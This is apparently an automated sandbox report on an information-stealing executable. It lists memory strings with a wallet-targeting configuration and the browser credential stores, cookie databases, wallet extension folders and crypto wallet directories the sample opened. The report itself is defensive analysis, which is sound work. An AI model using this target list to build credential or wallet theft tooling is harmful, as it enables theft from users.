                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":209715oH
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1598928091.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: (insertion_info.second) == (true)
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSB
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSB
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMU
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMU
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSB
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSB
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
